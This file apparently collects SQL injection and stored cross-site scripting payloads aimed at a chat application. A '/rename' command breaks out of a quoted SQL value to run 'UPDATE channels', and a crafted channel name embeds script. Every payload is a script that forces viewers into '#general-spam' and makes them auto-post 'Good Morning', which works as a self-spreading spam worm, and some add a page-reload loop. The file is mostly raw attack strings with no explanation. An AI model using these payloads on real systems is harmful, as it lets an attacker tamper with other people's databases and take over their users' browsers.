/rename bob Bob Marmite' WHERE username = "bob"; UPDATE channels SET channel = '#nsk-home<script> SwitchChannel("#general-spam"); document.getElementById("message").innerHTML = "Good Morning"; PostMessage();</script>' WHERE channel_id = "1"; FAIL THE SYSTEM MESSAGE (LIKE A CYBERNINJA)



/// /rename bob Bob Marmite WHERE username = 'bob'; UPDATE channels SET channel = "#nsk-not-home<script> SwitchChannel("#general-spam"); document.getElementById("message").innerHTML = "Good Morning"; PostMessage();</script>" WHERE channel_id = 1; -- <script>PostMessage()</script>


///rename bob Bob Marmite' WHERE username = "bob"; UPDATE channels SET channel = '#nsk-home<script> SwitchChannel("#general-spam"); document.getElementById("message").innerHTML = "Good Morning"; PostMessage();</script>' WHERE channel_id = "1"; <script> document.location.reload() </script> --
// <script>SwitchChannel("#general-spam"); document.getElementById("message").innerHTML = "Good Morning"; PostMessage();</script>


// /rename bob Bob Marmite<script>SwitchChannel("#general-spam"); document.getElementById("message").innerHTML = "Good Morning"; PostMessage();</script>' WHERE username = 'bob'; UPDATE channels SET channel = '#nsk-home<script> SwitchChannel("#general-spam"); document.getElementById("message").innerHTML = "Good Morning"; PostMessage();</script>' WHERE channel_id = "1"; --


// Good Morning
// <script> add_channel("<script> SwitchChannel("#general-spam"); document.getElementById("message").innerHTML = "Good Morning"; PostMessage();</script>", true);</script> --
// 	if (localStorage.length > 0 && localStorage.getItem(1) == "Good Morning")
// 	{
		
// 	}
// 	else
// 	{

// 	}

// 	/join #An Inconspicuous Channel<script> SwitchChannel("#general-spam"); document.getElementById("message").innerHTML = "Good Morning"; PostMessage(); </script>
// 	/rename bob Bob Marmite' WHERE username = 'bob';<script> add_channel("<script> SwitchChannel("#general-spam"); document.getElementById("message").innerHTML = "Good Morning"; PostMessage();</script>", true);</script> -- Good




// <script>document.location.reload()</script>